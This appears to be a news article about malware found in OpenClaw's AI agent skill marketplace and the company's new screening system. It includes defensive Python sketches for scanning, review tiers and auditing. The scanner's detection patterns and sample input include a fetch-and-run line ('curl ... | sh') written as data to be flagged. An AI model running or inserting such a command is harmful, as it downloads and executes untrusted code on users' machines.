OpenClaw Deploys Verified Skill Screening After Malware Discovery in AI Agent Marketplace

Security researchers uncovered that 12% of skills in OpenClaw's AI agent marketplace contained malware. The company has now released a verified skill screening system to combat the threat and protect users from compromised code.

The Malware Crisis in AI Agent Marketplaces

The open-source AI agent ecosystem faces a critical trust problem. The researchers' finding that 12% of skills in OpenClaw's marketplace contained malware exposes a fundamental weakness in how third-party integrations are vetted. It also underscores a broader challenge for the rapidly expanding AI agent ecosystem: as developers rush to build and share capabilities, security screening has lagged dangerously behind.

OpenClaw's marketplace operates as a central hub where developers contribute "skills", modular extensions that expand what an agent can do. Traditional software repositories have established security practices. The AI agent space, by contrast, has grown so quickly that malware detection has struggled to keep pace. The 12% infection rate therefore points not just to a technical problem but to a systemic failure in trust infrastructure.

OpenClaw's Response: Verified Skill Screening

In response to the security crisis, OpenClaw has shipped a verified skill screening system designed to filter out compromised code before it reaches users. The update introduces automated and manual review processes intended to catch malicious payloads, obfuscated code, and suspicious dependencies.

Key features of the security update include:

- Automated scanning for known malware signatures and suspicious code patterns

- Manual review workflows for high-risk or flagged skills

- Dependency auditing to identify compromised upstream packages

- Developer verification requirements to establish accountability

- Rollback capabilities for rapid removal of compromised skills
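The announcement does not describe how OpenClaw's scanner works internally. As a rough illustration of the signature-scanning, pattern-matching, and dependency-auditing features, here is a minimal Python sketch under stated assumptions. The hash set, regex heuristics, deny-list, `ScanReport`, and `scan_skill` are all hypothetical, and a skill is modeled simply as a mapping of file paths to bytes plus a list of (name, version) dependencies.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Hypothetical signature database: SHA-256 digests of files already known to be malicious.
KNOWN_BAD_SHA256 = {
    hashlib.sha256(b"malicious payload example").hexdigest(),
}

# Hypothetical heuristics for "suspicious code patterns"; real scanners use far richer rule sets.
SUSPICIOUS_PATTERNS = {
    "dynamic_exec": re.compile(r"\b(eval|exec)\s*\("),
    "base64_decode": re.compile(r"base64\.b64decode|atob\("),
    "pipe_to_shell": re.compile(r"curl[^\n|]*\|\s*(sh|bash)\b"),
}

# Hypothetical deny-list of compromised upstream packages as (name, version) pairs.
COMPROMISED_DEPENDENCIES = {("example-lib", "1.2.3")}


@dataclass
class ScanReport:
    signature_hits: list = field(default_factory=list)
    pattern_hits: list = field(default_factory=list)
    dependency_hits: list = field(default_factory=list)

    @property
    def flagged(self) -> bool:
        # Any finding routes the skill to manual review instead of auto-publishing.
        return bool(self.signature_hits or self.pattern_hits or self.dependency_hits)


def scan_skill(files: dict, dependencies: list) -> ScanReport:
    """Scan a skill's files and declared dependencies (hypothetical data model)."""
    report = ScanReport()
    for path, content in files.items():
        # Exact-match signature check on the raw file bytes.
        if hashlib.sha256(content).hexdigest() in KNOWN_BAD_SHA256:
            report.signature_hits.append(path)
        # Heuristic pattern check on the decoded text.
        text = content.decode("utf-8", errors="replace")
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(text):
                report.pattern_hits.append((path, name))
    # Dependency audit against the deny-list.
    for dep in dependencies:
        if tuple(dep) in COMPROMISED_DEPENDENCIES:
            report.dependency_hits.append(tuple(dep))
    return report


report = scan_skill(
    {"install.sh": b"curl https://example.com/x | sh", "main.py": b"print('hi')"},
    [("example-lib", "1.2.3"), ("requests", "2.31.0")],
)
print(report.flagged)  # True
```

In this sketch a hit flags the skill for the manual review workflow rather than rejecting it outright, because heuristics like these produce false positives: a legitimate install script may also pipe `curl` into a shell.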

According to OpenClaw's security practices documentation, the company is implementing a tiered verification system where skills progress through increasing levels of scrutiny based on their access permissions and usage patterns.
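To make the idea of a tiered system concrete, the following sketch assigns a review tier from a skill's requested permissions and its install volume. The tier names, permission names, weights, and thresholds are invented for illustration and are not OpenClaw's actual policy.

```python
from enum import IntEnum


class ReviewTier(IntEnum):
    AUTOMATED = 1     # automated scanning only
    SPOT_CHECKED = 2  # automated scanning plus sampled manual review
    FULL_MANUAL = 3   # mandatory manual review before publication


# Hypothetical risk weights; these permission names are illustrative only.
PERMISSION_RISK = {
    "read_files": 1,
    "network": 2,
    "write_files": 2,
    "shell_exec": 4,
    "credentials": 4,
}
UNKNOWN_PERMISSION_RISK = 4   # fail closed: unrecognized permissions count as high risk
POPULARITY_THRESHOLD = 1000   # hypothetical weekly-install cutoff
POPULARITY_PENALTY = 2        # widely used skills reach more users if compromised


def assign_tier(permissions: set, weekly_installs: int) -> ReviewTier:
    """Map a skill's permissions and usage to a (hypothetical) review tier."""
    risk = sum(PERMISSION_RISK.get(p, UNKNOWN_PERMISSION_RISK) for p in permissions)
    if weekly_installs >= POPULARITY_THRESHOLD:
        risk += POPULARITY_PENALTY
    if risk >= 6:
        return ReviewTier.FULL_MANUAL
    if risk >= 3:
        return ReviewTier.SPOT_CHECKED
    return ReviewTier.AUTOMATED


print(assign_tier({"read_files"}, 50).name)             # AUTOMATED
print(assign_tier({"shell_exec", "network"}, 10).name)  # FULL_MANUAL
```

With these assumed weights, a low-usage skill requesting only `read_files` stays at automated scanning, while one requesting `shell_exec` and `network` lands in full manual review regardless of popularity. Treating unknown permissions as high risk is a deliberate fail-closed choice.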



The Broader Context: A Pattern of Vulnerabilities

This security update arrives amid a series of disclosed vulnerabilities in the OpenClaw ecosystem. Previous reporting indicates that the problems extend beyond marketplace skills to the core platform itself. Taken together, marketplace malware and platform-level exploits suggest that OpenClaw needs comprehensive security hardening across multiple layers.

The incident reflects a fundamental tension in open-source AI development: rapid innovation and community contribution create powerful ecosystems, but they also expand the attack surface. Malicious actors can exploit this rush to market by publishing compromised skills that pass casual inspection as legitimate.

What This Means for Users and Developers

For users deploying OpenClaw agents in production environments, the implications are significant:

- Immediate action: Review currently deployed skills against the verified registry

- Adoption timeline: Plan migration to verified skills as the screening process matures

- Dependency audits: Conduct independent security reviews of critical skills and their dependencies
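For the first recommendation, one simple approach is to compare each installed skill against a snapshot of the verified registry by name, version, and content hash. The sketch below assumes such a snapshot is available as a dictionary mapping `(name, version)` to a SHA-256 digest. `DeployedSkill`, `audit_deployed`, and the registry format are hypothetical, not an OpenClaw API.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class DeployedSkill:
    name: str
    version: str
    content: bytes  # packaged skill contents as installed locally (simplified model)


def audit_deployed(skills, verified_registry):
    """Classify each deployed skill as 'verified', 'modified', or 'unverified'.

    verified_registry is a hypothetical snapshot mapping (name, version)
    to the SHA-256 hex digest of the package that passed screening.
    """
    results = {}
    for skill in skills:
        expected = verified_registry.get((skill.name, skill.version))
        if expected is None:
            results[skill.name] = "unverified"  # not in the verified registry at all
        elif hashlib.sha256(skill.content).hexdigest() != expected:
            results[skill.name] = "modified"    # listed, but local bytes differ from the reviewed package
        else:
            results[skill.name] = "verified"
    return results


registry = {
    ("calendar", "1.0.0"): hashlib.sha256(b"calendar skill v1").hexdigest(),
    ("mailer", "2.1.0"): hashlib.sha256(b"mailer skill v2").hexdigest(),
}
deployed = [
    DeployedSkill("calendar", "1.0.0", b"calendar skill v1"),
    DeployedSkill("mailer", "2.1.0", b"mailer skill v2 + injected code"),
    DeployedSkill("crypto-helper", "0.1.0", b"unknown package"),
]
print(audit_deployed(deployed, registry))
# {'calendar': 'verified', 'mailer': 'modified', 'crypto-helper': 'unverified'}
```

A `modified` result is the more alarming outcome here: the skill appears in the verified registry, but the locally installed copy differs from what was reviewed.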

For developers, the update establishes new submission requirements that may slow the pace of skill releases but should improve overall ecosystem health.

Looking Forward

The technical details of the security update are available in OpenClaw's release notes, where the development team has documented the screening methodology and provided guidance for skill developers seeking verification.

The 12% malware discovery rate serves as a wake-up call for the entire AI agent ecosystem. As these systems move from research projects to production deployments handling sensitive tasks, security cannot remain an afterthought. OpenClaw's verified skill screening represents a necessary step, but the broader industry will need to establish stronger standards for third-party code review, supply chain security, and developer accountability.

The question now is whether this response will be sufficient to restore user confidence, or whether the marketplace will require even more restrictive controls to achieve acceptable security baselines.